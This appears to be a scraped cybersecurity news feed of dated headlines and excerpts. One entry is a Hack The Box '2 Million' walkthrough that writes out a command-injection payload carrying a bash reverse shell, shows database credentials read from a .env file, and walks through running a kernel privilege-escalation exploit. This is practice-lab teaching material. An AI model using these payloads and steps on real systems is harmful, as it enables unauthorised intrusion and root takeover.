Lithuanian Criminal Police Bureau Spain: Central Investigative Court 1 and 5 of Audiencia Nacional; Spanish National Police The operation was also supported by Europol’s Operational Task Force, which was established to monitor criminal activity on encrypted platforms like MATRIX. The task force played a crucial role in providing technical and operational support during the investigation. An Evolving Cybersecurity Landscape The takedown of MATRIX adds to a growing list of encrypted criminal communication platforms that have been disrupted in recent years. Prior to MATRIX, law enforcement successfully dismantled Sky ECC and EncroChat, two other popular platforms used by cybercriminals. These operations have demonstrated the ability of law enforcement agencies to infiltrate and shut down encrypted communication services that criminals rely on to carry out illegal activities. However, as criminals adapt to the disruption of their communication tools, law enforcement faces an increasingly fragmented landscape. Criminals have turned to less-established or custom-built encrypted platforms, which offer varying levels of security and anonymity. Despite this challenge, the successful takedown of MATRIX sends a strong message that authorities are constantly evolving their tactics to stay ahead of cybercriminals.
by The Cyber Express
2024-12-04 07:56:06
U.S. CISA adds ProjectSend, North Grid Proself, and Zyxel firewalls bugs to its Known Exploited Vulnerabilities catalogU.S. Cybersecurity and Infrastructure Security Agency (CISA) adds ProjectSend, North Grid Proself, and Zyxel firewalls bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: Proself versions before Ver5.62, Ver1.65, and Ver1.08 are vulnerable to XXE attacks, allowing unauthenticated attackers […]
by Security Affairs
2024-12-04 07:46:22
Docker/Kubernetes (K8s)Penetration Testing ChecklistDocker/Kubernetes (K8s) Penetration Testing involves identifying and assessing security vulnerabilities within containerized environments…Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-12-04 07:46:07
TryHackme’s Advent of Cyber 2024 — Day 03 WriteupDay 3: Even if I wanted to go, their vulnerabilities wouldn’t allow it.Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-12-04 07:46:03
Tricky & Simple EXIF protection BypassHello Hackers! 👋It’s been a year and a half since my last write-up, so I thought lets share something simple yet interesting. I recently came across an intriguing vulnerability and thought I’d share it with you all. Let’s dive in!For beginners or those unfamiliar with EXIF vulnerabilities, I recommend reviewing this article first before returning to the current one.As always there is an web-application, this platform allows users to upload an image as their profile picture. However, I noticed that the image wasn’t being replicated anywhere within the application’s dashboard or services, so I moved on to explore other functionalities such as login and password reset..During the login process, after entering an email address, the application displayed the user’s profile picture.I opened the image in a new tab, and the URL appeared as follows:https://pic.abc.com/eyJ----------------------JWT_token--------------------If I paste this URL on jimpl.com to retrieve EXIF data it did not show any location specific data.However, I decided to investigate further.(Again if you don’t know about JWT token go through this article.)I extracted the JWT token from the URL, navigated to JWT.io, and pasted the token there. In the token’s header section, I discovered a different URL.I copied this new URL and pasted it into Jimpl.com, where I was able to successfully retrieve the EXIF data associated with the image, effectively bypassing the EXIF protection mechanism.Isn’t it interesting and simple?If you liked it do follow me on Twitter & Linkedin .Tricky & Simple EXIF protection Bypass was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
2024-12-04 07:45:54
Critical Bug: Deny Sign-In & Steal Sensitive Info on Behalf of VictimsRead FreeContinue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-12-04 06:55:30
Telecoms on High Alert: New Cybersecurity Guidelines to Defend Against PRC-Affiliated ThreatsThe Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), the Federal Bureau of Investigation (FBI), and their international partners have released a comprehensive set of guidelines aimed at enhancing the security of telecommunications infrastructure. The joint publication, titled Enhanced Visibility and Hardening Guidance for Communications Infrastructure, offers critical advice to network engineers and defenders tasked with protecting global communications networks from advanced persistent threats (APTs) tied to the People’s Republic of China (PRC). The Cyber Espionage Threat The new guidance comes in the wake of warnings issued by CISA and the FBI about an ongoing, broad cyber espionage campaign conducted by PRC-affiliated threat actors. These cybercriminals have successfully infiltrated the networks of major telecommunications providers worldwide, compromising sensitive data and potentially jeopardizing national security, critical infrastructure, and private businesses. The objective of the campaign, as detailed by officials, is to extract valuable information for intelligence-gathering purposes. Jeff Greene, Executive Assistant Director for Cybersecurity at CISA, emphasized the seriousness of the threat: “The PRC-affiliated cyber activity poses a serious threat to critical infrastructure, government agencies, and businesses. This guide will help telecommunications and other organizations detect and prevent compromises by the PRC and other cyber actors.” A Call to Action for Network Defenders The newly released guide outlines a series of best practices designed to help organizations strengthen their networks against cyber threats. While tailored primarily for the telecommunications sector, these recommendations are applicable to any organization operating critical infrastructure, including businesses with on-premises enterprise equipment. One of the central themes of the guidance is the importance of enhancing visibility within networks. This refers to the ability of network defenders to detect and analyze activity across their systems, including network traffic, user behaviors, and data flows. High visibility ensures that potential threats can be quickly identified and mitigated before they lead to serious breaches. Strengthening Visibility in Communications Infrastructure To improve visibility, CISA and the FBI recommend that network engineers implement strong monitoring systems and processes to detect anomalous behaviors or unauthorized changes in network configurations. These recommendations include: Monitoring Configuration Changes: Network engineers are advised to closely track changes to critical network devices like routers, firewalls, and switches, especially those that occur outside of established change management protocols. Unusual alterations, such as unauthorized route updates or the activation of weak protocols, should trigger alerts for immediate investigation. Centralized Configuration Management: Storing device configurations centrally, instead of relying on the devices themselves, helps ensure a single, trusted source of truth for network settings. Frequent testing and validation of configurations are also encouraged to ensure they remain secure and effective. Monitoring User and Service Accounts: Suspicious logins, particularly those from unknown or unexpected sources, should be closely monitored. It''s also important to regularly review and disable inactive accounts to reduce the attack surface. Secure Logging and Data Analysis: Implementing centralized logging, where log data is securely stored and can be easily analyzed, helps identify security incidents faster. Encrypted log transmission is essential to prevent tampering or interception. By improving network visibility, defenders can identify threats early in their lifecycle and respond to them more effectively, reducing the risk of a successful compromise. Hardening Systems and Devices Alongside increasing visibility, the guide stresses the importance of hardening network systems and devices. This means reducing vulnerabilities through secure configuration practices and implementing defense-in-depth strategies that limit potential entry points for cyber actors. Key recommendations for hardening devices include: Out-of-Band Management: Network engineers should manage devices through a physically separate management network, isolated from the operational data flow. This limits the potential for lateral movement by attackers in case of a compromised device. Strict Access Controls: Implementing default-deny access control lists (ACLs) and network segmentation can block unauthorized traffic and isolate critical systems. Devices with sensitive functions, such as DNS servers or email servers, should be placed in a demilitarized zone (DMZ) to further reduce the risk of exposure. Use of Strong Encryption: Strong encryption practices should be employed across all traffic, particularly for VPNs and remote management tools. Vulnerabilities in outdated encryption protocols should be mitigated by using the latest cryptographic standards, such as AES-256 and TLS 1.3. Disabling Unnecessary Services: Services like Telnet, FTP, and older versions of SSH should be disabled, as they are often targeted by attackers looking for weak entry points into the network. Regular Updates and Patching: It is essential to keep all devices and software up-to-date with the latest security patches. Additionally, network defenders should regularly monitor vendor announcements for end-of-life (EOL) notifications and upgrade equipment accordingly. By hardening network devices and systems, organizations can make it significantly more difficult for threat actors to exploit vulnerabilities and gain unauthorized access to critical networks. CISA, NSA, and FBI: A Unified Effort to Safeguard Critical Infrastructure In conclusion, the cybersecurity agencies behind the guide—CISA, NSA, and FBI—are urging all organizations, especially those involved in critical infrastructure, to adopt these best practices. As Jeff Greene highlighted, it is crucial for software manufacturers to integrate Secure by Design principles into their development processes to ensure that future vulnerabilities are minimized. Bryan Vorndran, Assistant Director of the FBI’s Cyber Division, also stressed the importance of collaborative action: “Together with our interagency partners, the FBI issued guidance to enhance the visibility of network defenders and to harden devices against PRC exploitation.” Ultimately, this guidance not only aims to defend against PRC-affiliated actors but also to enhance the overall security posture of telecommunications infrastructure and other critical sectors. By implementing these measures, network defenders can better prepare for and respond to evolving cyber threats, helping to protect sensitive data and maintain the integrity of essential services.
by The Cyber Express
2024-12-04 06:27:07
Save Big This Season: Practical Tips for Stress-Free ShoppingBlack Friday is the best, right? Well, sometimes. Deals everywhere, and chaos too. I’ve had moments feeling so lost in the sea of discounts it almost made me give up shopping altogether. But over the years, I’ve learned a few tricks. Here’s how I handle it, step by step—no fluff, just what works. From figuring out what I want in advance to using apps that do the heavy lifting, these tips can help make Black Friday more about saving than stressing. 1. Start with Research Before I even think about shopping, I get organized. Not too much work, but enough to save headaches later. I jot down exactly what I want: brands, sizes, model numbers, and all that. Last year, I skipped this and wasted hours online. Learned my lesson. Now, I look at online reviews, compare specs, and even save product links on my phone. Honestly, the key is knowing what to expect price-wise. Retailers are sneaky. “50% off” isn’t a deal if they jacked up prices last month. I bookmark price trackers and keep an eye out for weeks before the sales start. Apps like Honey or CamelCamelCamel are game-changers. 2. Subscribe to Newsletters (Yes, Really) Some people hate spam. Me? I use it. Signing up for store emails means you hear about discounts first. I don’t check them daily, but during the Black Friday season, those emails are pure gold. Some stores send early access links to deals. I got my headphones that way last year—saved $70 before most people even knew they were discounted. A quick tip: turn on app notifications for stores like Target or Amazon. I used to hate push alerts, but now they let me catch limited-time offers I’d otherwise miss. Life’s too short to be refreshing pages all day. 3. The Coupons App Is a Lifesaver Ever heard of The Coupons App? It’s fantastic. I downloaded it when a friend wouldn’t stop talking about it, and wow. It doesn’t just find promo codes—it applies them to you. It’s like magic. I’ve even snagged freebies nearby, like a free coffee once. The app also tracks price drops. That’s how I got a laptop at $150 off without stalking sales all month. No app is perfect, though. Sometimes, codes don’t work, or deals are region-specific. But on the whole, it’s a superb choice. Little savings add up over time. 4. Loyalty Programs Pay Off I used to ignore loyalty cards, thinking they weren’t worth it. Big mistake. Stores like Old Navy or Macy’s give members discounts others don’t get. A lot of them let you earn points too, which can translate to free money later. I’ve scored free shirts and even got a $20 store credit once—just for shopping during Black Friday. 5. Price Comparison: The Secret Weapon Impulse buys are tempting, but not every sale is as good as it looks. I use apps like Google Price Scanner to compare prices. It’s quick and makes me feel like I’m not being ripped off. Did you know some stores price-match too? Best Buy does, but only if you ask. I’ve walked up to customer service and gotten refunds on price differences just because I checked. One more thing: don’t stop comparing prices after Black Friday. Cyber Monday often has better deals on tech. Missed the sale? No worries, because stores tend to extend discounts all weekend. 6. Understand Return Policies Returns can save you big time. Keep every receipt, digital or paper. Why? If a price drops after you buy something, you can sometimes get a refund for the difference. I’ve done this at Target and even Walmart. Some stores give you until January to return items bought during holiday sales. It’s like a safety net. If I find something cheaper later, I’ll just return the pricier version. One little hack: buy the lower-priced item and return the expensive one. A bit tedious but totally worth it for bigger savings. 7. Stick to Online Shopping Shopping in-store is rarely worth it anymore. I’ve skipped the crowds the past few years and don’t regret it. Online, I can compare deals from my couch—no lines, no pushing, no stress. Sites even offer web-exclusive sales that beat in-store prices. Just don’t forget to double-check shipping deadlines. Missed packages are the worst. 8. Timing Is Everything Not every deal drops on Black Friday. Some stores start sales early—like mid-November. If I spot a decent price a week before, I’ll buy it. Why risk waiting for a better deal when I might lose out completely? Also, don’t sleep on Wednesday before Black Friday. Weird, but true: it’s often quieter and less competitive. 9. Doorbusters: Worth It? Let me be real: I’m over doorbusters. Camping out all night for one TV? Not my vibe. But if you do go in person, get there at dawn—or earlier. The crowds aren’t as crazy as they used to be, but the best deals still vanish fast. Once, I tried going mid-morning, and half the stock was gone. Never again. 10. Don’t Forget Gift Cards If you have unused gift cards lying around, now’s the time to use them. I’ve bought discounted cards from websites and used them during sales for extra savings. Think about it: buying $50 worth of stuff but only paying $40 because of a gift card? Feels like winning twice. 11. Have Fun, But Set Limits Black Friday is electrifying, but it’s easy to splurge. I always set a budget now. Not just for big purchases, but for everything. Snacks, small gifts, stocking stuffers—it all adds up. The goal is to save money, not blow it. Black Friday doesn’t have to be stressful. Do a little prep, use the right tools, and focus on what you need, not just what’s cheap. That’s how I make it through without feeling overwhelmed—or broke.
by The Cyber Express
2024-12-04 00:56:31
Horns&Hooves Campaign Delivers RATs to Russian Retail EntitiesSummary Researchers from SecureList from Kaspersky revealed new details regarding the Horns&Hooves cyber campaign, active since March 2023, which targeted over a thousand users and businesses in Russia (including retailers), using malicious JScript (JS) scripts disguised as legitimate email attachments. These scripts deploy the legitimate remote administration tool, NetSupport, for malicious purposes, granting attackers remote access...
by RH-ISAC
2024-12-04 00:00:00
CrowdStrike Announces Falcon Identity Protection for AWS IAM Identity Center
by CrowdStrike
2024-12-04 00:00:00
CrowdStrike Showcases Cloud Security Innovation and Leadership at AWS re:Invent
by CrowdStrike
2024-12-03 23:25:24
SecureG, CTIA Project Secures Business Phone CallsBCID mitigates the risk of consumers being harmed by fraud and bad actors by vetting to deliver a trusted, branded call experience for consumers.
by Dark Reading
2024-12-03 22:34:37
Misconfigured WAFs Heighten DoS, Breach RisksOrganizations that rely on their content delivery network provider for Web application firewall services may be inadvertently leaving themselves open to attack.
by Dark Reading
2024-12-03 22:31:42
BigID Releases Data Activity Monitoring to Extend DDR, Detect Malicious Actors, and Strengthen Data Security Posture
by Dark Reading
2024-12-03 22:25:00
Technical Analysis of FPNTX Digital Skimmer Found on eCommerce SiteOn 3 December 2024, the RH-ISAC intel team was informed about a possible digital skimmer that may be present on an unnamed e-commerce website. JJ Josing, Principal Threat Researcher at the RH-ISAC, started his initial investigation into this incident. Our investigation discovered a script block containing heavily obfuscated JavaScript in the HTML of the checkout...
by RH-ISAC
2024-12-03 22:20:52
KnowBe4 Releases the Latest Phishing Trends in Q3 2024 Phishing Report
by Dark Reading
2024-12-03 21:19:05
Extending Falco for SalesforceAs many in the CNCF community know, Falco’s flexibility can be extended through Plugins, allowing users to build custom integrations... The post Extending Falco for Salesforce appeared first on Sysdig.
by Sysdig
2024-12-03 21:13:47
Note From the Editor-in-ChiefA change in ownership and what it means for our readers.
by Dark Reading
2024-12-03 20:49:31
AI chatbot provider exposes 346,000 customer files, including ID documents, resumes, and medical recordsAI chatbot provider WotNot left a cloud storage bucket exposed that contained almost 350,000 files, including personally identifiable information.
by Malwarebytes Labs
2024-12-03 20:43:00
From deals to DDoS: exploring Cyber Week 2024 Internet trendsHow significant are Cyber Week shopping days on the Internet? Is it a global phenomenon? Does E-commerce interest peak on Black Friday or Cyber Monday, and are attacks increasing during this time? We try to answer these questions and more.
by Cloudflare
2024-12-03 20:25:34
Decade-Old Cisco Vulnerability Under Active ExploitCisco encourages users to update to an unaffected version of its Adaptive Security Appliance (ASA) software since there are no workarounds for the 2014 vulnerability.
by Dark Reading
2024-12-03 20:19:37
With Threats to Encryption Looming, Signal’s Meredith Whittaker Says ‘We’re Not Changing’At WIRED’s The Big Interview event, the president of the Signal Foundation talked about secure communications as critical infrastructure and the need for a new funding paradigm for tech.
by WIRED Security News
2024-12-03 19:43:27
Malicious Google Ads Target Users Seeking Solutions to Printer ProblemsScammers are abusing Google ads to target users searching for help with printer problems, according to researchers at Malwarebytes.
by KnowBe4
2024-12-03 19:43:22
Phishing Attacks Impersonating Big Brands Starts to Zero in on Just One BrandThe latest data on brand phishing trends shows one brand dominating quarter over quarter, but also continuing to take on a larger share of the brand impersonation.
by KnowBe4
2024-12-03 19:30:00
I deleted thousands of tweets from X with this new tool - for freeNow you can easily migrate from X with this powerful tool that deletes tweets, likes, and DMs, while backing up your data for a fresh start elsewhere.
by ZDNET Security
2024-12-03 19:18:29
FTC Says Data Brokers Unlawfully Tracked Protesters and US Military PersonnelThe FTC is targeting data brokers that monitored people’s movements during protests and around US military installations. But signs suggest the Trump administration will be far more lenient.
by WIRED Security News
2024-12-03 19:18:23
Undeclared functionality in machine learning systemsHidden logic, data poisoning, and other targeted attack methods using AI systems.
by Kaspersky
2024-12-03 19:10:33
And the Winner of The Inside Man Biggest Fan Contest 2024 is…It’s been several weeks since the exciting premiere of The Inside Man - Season 6 in St. Petersburg, Fl. If you missed my post, I talked about this magical night where we released the latest blockbuster season of this award winning security awareness series.
by KnowBe4
2024-12-03 19:00:00
He Got Banned From X. Now He Wants to Help You Escape, TooWhen programmer Micah Lee was kicked off X for a post that offended Elon Musk, he didn''t look back. His new tool for saving and deleting your X posts can give you that same sweet release.
by WIRED Security News
2024-12-03 18:42:31
Repeat offenders drive bulk of tech support scams via Google AdsConsumers are getting caught in a web of scams facilitated by online ads often originating from the same perpetrators.
by Malwarebytes Labs
2024-12-03 18:31:48
Data Leak Exposes Millions of Top Corporations Employee RecordsA new wave of data leaks by the cybercriminal known as “Nam3L3ss” has surfaced, exposing sensitive employee information from some of the world''s largest companies. The leaked databases, stemming from previous CL0P ransomware attacks exploiting the MOVEit vulnerability (CVE-2023-34362), include millions of records detailing corporate hierarchies, personal data, and internal identifiers. The leaks, posted on … The post Data Leak Exposes Millions of Top Corporations Employee Records appeared first on CyberInsider.
by Cyber Insider
2024-12-03 18:21:00
Cisco Warns of Exploitation of Decade-Old ASA WebVPN VulnerabilityCisco on Monday updated an advisory to warn customers of active exploitation of a decade-old security flaw impacting its Adaptive Security Appliance (ASA). The vulnerability, tracked as CVE-2014-2120 (CVSS score: 4.3), concerns a case of insufficient input validation in ASA''s WebVPN login page that could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack
by The Hacker News
2024-12-03 18:07:08
Unlocking the Power of AI in Intelligent Document ProcessingIntelligent document processing (IDP) has evolved beyond OCR, leveraging AI tools like NLP, LLMs, and computer vision to turn data into actionable insights.
by ITPro Today
2024-12-03 18:05:46
2million HTB walkthroughIt’s been a very long time since I last dived into a Hack The Box machine, but today, we’re back with a fun and exciting journey into “2 Million,” an easy retired HTB machine. In this write-up, we’ll be tackling the machine in guided mode—a straightforward and structured approach designed to help beginners like me to follow along with solid steps while enjoying the steep learning curve. Let’s gear up and dive into this box together. Initial Access Task 1: How many TCP ports are open? ┌─[us-dedivip-1]─[10.10.14.72]─[mccleod1290@htb-zjn9n4winb]─[~] └──╼ [★]$ nmap -p- --min-rate 10000 10.129.254.214 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 09:10 CST Nmap scan report for 2million.htb (10.129.254.214) Host is up (0.0093s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 4.87 seconds Answer: 2 Task 2: What is the name of the JavaScript file loaded by the /invite page that has to do with invite codes? Step one, visit and check /invite step 2: check browser console, check out network tab we see an request made to an js file, and this is our answer. Answer: inviteapi.min.js Task 3: What JavaScript function on the invite page returns the first hint about how to get an invite code? Don’t include () in the answer. Step 1 visit the inviteapi.min.js and then understand the code with chatgpt, you will get answer for the following three tasks. Answer: http://2million.htb/js/inviteapi.min.js Task 4: The endpoint in makeInviteCode returns encrypted data. That message provides another endpoint to query. That endpoint returns a code value that is encoded with what very common binary to text encoding format. What is the name of that encoding? This task involves in numerous steps from understanding the code, to making an request to getting the invite code let’s break down each step by step. Step 1: Analysing the code and understanding via chatgpt we see two important functions and they are eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return''\\w+''};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(''\\b''+e(c)+''\\b'',''g''),k[c])}}return p}(''1 i(4){h 8={""4"":4};$.9({a:""7"",5:""6"",g:8,b:\''/d/e/n\'',c:1(0){3.2(0)},f:1(0){3.2(0)}})}1 j(){$.9({a:""7"",5:""6"",b:\''/d/e/k/l/m\'',c:1(0){3.2(0)},f:1(0){3.2(0)}})}'',24,24,''response|function|log|console|code|dataType|json|POST|formData|ajax|type|url|success|api/v1|invite|error|data|var|verifyInviteCode|makeInviteCode|how|to|generate|verify''.split(''|''),0,{})) Step 2: If we send post request to these endpoints we get our responses and one of the response has flag. We can see, that the above endpoint gives us an base64 encoded value which is our answer. We can use this invite code to sign up as user!! Answer: base64 Task : 5 What is the path to the endpoint the page uses when a user clicks on “Connection Pack”? Look around the website and in this url we can access the connection pack. http://2million.htb/home/access The following is the embeded link for connection pack. http://2million.htb/api/v1/user/vpn/generate Task 6: How many API endpoints are there under /api/v1/admin? We see that there are 3 endpoints for admin and we can get this by sending GET request to /api/v1 or using this curl command curl -X GET ""http://2million.htb/api/v1"" -H ""Cookie: PHPSESSID=135culru6kejajj86ta2n6nh27"" | jq answer 3 Task 7: What API endpoint can change a user account to an admin account? Answer: /api/v1/admin/settings/update For some unknown reasons, we are unable to get any positive response from /api/v1/admin/* , we tried changing request from GET to POST but nothing works. Let’s have an look at /api/v1/user/* and first let’s check /api/v1/user/auth We see data returned in json, which mean application accepts json, so let’s try some attacks by injection something malicious in json. Now we have valid input of json data to add to our http parameters. {""loggedin"":true,""username"":""userhello"",""is_admin"":0} Task 8: What API endpoint has a command injection vulnerability in it? Answer: /api/v1/admin/vpn/generate But when we try to access this endpoint we get HTTP/1.1 405 Method Not Allowed in burp response. So let’s try /api/v1/user/vpn/generate We can see that by copying the json data from previous task, and changing the content type to application/json we are able to achieve command injection, just make sure that the endpoint is accessed via POST !! Getting Shell Now open terminal and listen on port 443 sudo nc -nlvp 443 Now in burp suit change the json part of http request to following payload and you should get your reverse shell. {""loggedin"":true,""username"":""; bash -c ''bash -i >& /dev/tcp/10.10.14.94/443 0>&1'' ;"",""is_admin"":0} Task 9 :What file is commonly used in PHP applications to store environment variable values? After getting shell let’s look around we find .env in system we get an user and password, let’s re- use the username and password for ssh. www-data@2million:/home/admin$ ls ls user.txt www-data@2million:/home/admin$ cd /var/www/html cd /var/www/html www-data@2million:~/html$ ls ls Database.php Router.php VPN assets controllers css fonts images index.php js views www-data@2million:~/html$ ls -la ls -la total 56 drwxr-xr-x 10 root root 4096 Dec 2 17:40 . drwxr-xr-x 3 root root 4096 Jun 6 2023 .. -rw-r--r-- 1 root root 87 Jun 2 2023 .env -rw-r--r-- 1 root root 1237 Jun 2 2023 Database.php -rw-r--r-- 1 root root 2787 Jun 2 2023 Router.php drwxr-xr-x 5 root root 4096 Dec 2 17:40 VPN drwxr-xr-x 2 root root 4096 Jun 6 2023 assets drwxr-xr-x 2 root root 4096 Jun 6 2023 controllers drwxr-xr-x 5 root root 4096 Jun 6 2023 css drwxr-xr-x 2 root root 4096 Jun 6 2023 fonts drwxr-xr-x 2 root root 4096 Jun 6 2023 images -rw-r--r-- 1 root root 2692 Jun 2 2023 index.php drwxr-xr-x 3 root root 4096 Jun 6 2023 js drwxr-xr-x 2 root root 4096 Jun 6 2023 views www-data@2million:~/html$ cat .env cat .env DB_HOST=127.0.0.1 DB_DATABASE=htb_prod DB_USERNAME=admin DB_PASSWORD=SuperDuperPass123 ssh admin@10.129.254.214 Task 10: Submit the flag located in the admin user’s home directory. cat user.txt Privilege Escalation Task 11 What is the email address of the sender of the email sent to admin? Usually mail configuration is located in /var/mail let’s have an look at that folder and see if something is interesting. Answer: ch4p@2million.htb Task 12: What is the 2023 CVE ID for a vulnerability in that allows an attacker to move files in the Overlay file system while maintaining metadata like the owner and SetUID bits? Answer: CVE-2023-0386 Task 13: Submit the flag located in root’s home directory. Step1: First let’s have an look at the proof of concept for this exploit. We will be using https://github.com/sxlmnwb/CVE-2023-0386 to gain privileges, and if you look closely this contains a lot of files and folder, so either compress it into zip or download it as an zip file itself. Step2: Then using scp let’s upload the file into the victim machine. sshpass -p SuperDuperPass123 scp CVE-2023-0386-main.zip admin@10.129.206.206:/tmp/ Now we should have the exploit code in zip file on /tmp folder. Step 3: Unzip the code, and compile the exploit, have an look at README.md for compiling the code. admin@2million:/tmp$ unzip CVE-2023-0386-main.zip Archive: CVE-2023-0386-main.zip c4c65cefca1365c807c397e953d048506f3de195 creating: CVE-2023-0386-main/ inflating: CVE-2023-0386-main/Makefile ...[snip]... inflating: CVE-2023-0386-main/test/mnt.c admin@2million:/tmp$ cd CVE-2023-0386-main/ admin@2million:/tmp/CVE-2023-0386-main$ make all gcc fuse.c -o fuse -D_FILE_OFFSET_BITS=64 -static -pthread -lfuse -ldl fuse.c: In function ‘read_buf_callback’: fuse.c:106:21: warning: format ‘%d’ expects argument of type ‘int’, but argument 2 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 106 | printf(""offset %d\n"", off); | ~^ ~~~ ...[snip].. /usr/bin/ld: /usr/lib/gcc/x86_64-linux-gnu/11/../../../x86_64-linux-gnu/libfuse.a(fuse.o): in function `fuse_new_common'': (.text+0xaf4e): warning: Using ''dlopen'' in statically linked applications requires at runtime the shared libraries from the glibc version used for linking gcc -o exp exp.c -lcap gcc -o gc getshell.c Step 4: In the first session, I’ll run the next command from the instructions: admin@2million:/tmp/CVE-2023-0386-main$ ./fuse ./ovlcap/lower ./gc [+] len of gc: 0x3ee0 Open another terminal, since we are on cli, we have to start another ssh session on the target. ssh admin@10.129.254.214 Now in this terminal type in this command, and we should be root user. admin@2million:/tmp/CVE-2023-0386-main$ ./exp uid:1000 gid:1000 [+] mount success total 8 drwxrwxr-x 1 root root 4096 Jun 2 23:11 . drwxrwxr-x 6 root root 4096 Jun 2 23:11 .. -rwsrwxrwx 1 nobody nogroup 16096 Jan 1 1970 file [+] exploit success! To run a command as administrator (user ""root""), use ""sudo <command>"". See ""man sudo_root"" for details. root@2million:/tmp/CVE-2023-0386-main# root@2million:/# cat /root/root.txt Beyond Root Task 14: [Alternative Priv Esc] What is the version of the GLIBC library on TwoMillion? admin@2million:~$ ldd --version ldd (Ubuntu GLIBC 2.35-0ubuntu3.1) 2.35 Copyright (C) 2022 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Written by Roland McGrath and Ulrich Drepper. Answer: 2.35 Task 15: [Alternative Priv Esc] What is the CVE ID for the 2023 buffer overflow vulnerability in the GNU C dynamic loader? Answer: CVE-2023-4911 Task 16: [Alternative Priv Esc] With a shell as admin or www-data, find a POC for Looney Tunables. What is the name of the environment variable that triggers the buffer overflow? After answering this question, run the POC and get a shell as root. Repeat the step in task 13, this time for cve-2023-4911 exploit poc, and you should get root. Answer: GLIBC_TUNABLES
by HACKLIDO
2024-12-03 18:01:48
Detailing the Attack Surfaces of the WolfBox E40 EV ChargerThe WolfBox E40 is a Level 2 electric vehicle charge station designed for residential home use. Its hardware has a minimal user interface, providing a Bluetooth Low Energy (BLE) interface for configuration and an NFC reader for user authentication. Typical for this class of devices, the appliance employs a mobile application for the owner''s installation and regular operation of the equipment.At the moment of writing, the software versions were reported as follows:· Main module: 3.1.17· MCU module: 1.2.6· Mobile application: 1.0.3WolfBox EV Mobile ApplicationThe manufacturer distributes one application to configure and maintain the device. The application, named WolfBox EV, is available for both Android and iOS users. Figure 1 - Application Start Screen Interestingly, the application apparently allows pairing and managing with more than the expected EV charger devices; when attempting to add a new device, a list is presented that includes several other ostensibly known and accepted device types, such as lamps, switches, doorbells, mosquito repellent heaters, irrigators and battery packs, to name a few.While Trend Micro Zero Day Initiative (ZDI) did not thoroughly investigate this application for vulnerabilities or other bugs, problems in mobile applications have been used by threat actors in the past and represent a significant attack surface. Even though the mobile application itself is out of scope for the Pwn2Own Automotive contest, the research community ought to thoroughly review it.WolfBox E40 Hardware AnalysisTrend ZDI researchers have analyzed the discrete hardware components found in the device. The device itself is comprised of several printed circuit boards (PCBs) hosting the system; the “main PCB” contains power and communications electronics, while the human-machine interface is spread over three more PCBs, carrying correspondingly the LCD display, the NFC reader, and the LEDs. Below is a list of notable parts on the main PCB:· GigaDevice GD32F307VET6 (U12), ARM Cortex-M4 with 512K Flash· Tuya CBU-IPEX WiFi/BLE radio (U11)· Atmel ATMLH242 04CM (U13), likely to be an AT24C04 serial EEPROM· Winbond 25Q64JVSIQ (U14), 64MB serial FlashOn the board itself, the two terminal blocks on the left couple the device to both the power inlet from the grid and to the charging cable. The two relay units control the flow of power, with current transformers inserted inline. On the right-hand side at the top, the board houses a low-current switching power supply for its finer electronics. Below it, there is a 1.0F supercap, the MCU, and the Wi-Fi/BLE communications module. Finally, there is an undocumented DIP switch and a host of connectors with nothing connected to them except the last one; the single white wire goes to the CP line of the charging plug. Figure 2 - WolfBox power/processing board—top Of special note is the CN17 connector located right beside the MCU, which is used for SWD debugging.On the bottom side, the only component of note is the serial Flash chip. Figure 3 - WolfBox power/processing board—bottom Finally, the main PCB is covered in conformal coating. Trend Micro researchers discovered the coating to be soluble in acetone, allowing for easy removal where needed to facilitate probing.As a final note, Tuya provides some documentation regarding the wire protocol between their modules and system MCUs.The display and LED boards do not present much in terms of interesting components. The NFC board, however, carries a SmartLink SL2823 NFC interface chip coupled to an anonymous part ostensibly used to translate between the SmartLink chip and the rest of the system. Figure 4 - WolfBox NFC board In terms of potential attack surface and vectors, the outermost exposed interfaces are handled by the communications module, which then passes messages to the main MCU that, in turn, controls the power and human interfaces. As such, compromising the communications module may be a required step.Firmware ExtractionThe manufacturer, WolfBox, does not appear to provide any way to download firmware images or update packages for the device.Thus, upon the discovery of CN17, an attempt was made to extract the firmware from the GigaDevice MCU. By connecting a ST-Link V2 dongle, the MCU was detected successfully by the ST-Link software, allowing its on-chip Flash memory to be read. This brought an unexpected end to the MCU firmware extraction journey.Extracting firmware from the communications module proved to be a little more involved. The documentation for the module SoC – BK7231N – could be found on the Tuya website. It is said the chip has either 2MB or 4MB of Flash memory. Further research uncovered a tool used by the open-source community to program custom firmware to Tuya devices, among others. Trend ZDI researchers used the tool to read a Flash image out from the module SoC. This required some soldering: a USB-to-UART dongle was used to communicate with the module with the following connections:· Module TX on pin 15 -> UART bridge RX (white)· Module RX on pin 16 -> UART bridge TX (green)· Module ground on pin 16 -> UART bridge ground (black)In addition, the module CEN (reset) signal on pin 18 was also used, and power was supplied from a bench power supply via CN17. Figure 5 - A view of the USB-to-UART dongle soldered in place After all connections were made, the following procedure was used to extract the flash contents: Press and hold the SW2 button; this will hold the main MCU in reset, preventing it from interfering with communications. Supply power to the board. Start the uartprogram downloader script. The script will get stuck at Read Getting Bus.... Short the CEN signal to ground for a bit. The RF shield on the module can be used for that. This will apparently reboot the module into a state where the script can interact with it. Check if readout has started on the console. If not, retry step 4 until successful. The script may need to be restarted. Power off the board after the download has been completed. Here is what it should look like on the console, along with the command line parameters that were used: Firmware AnalysisWithout going too deep, 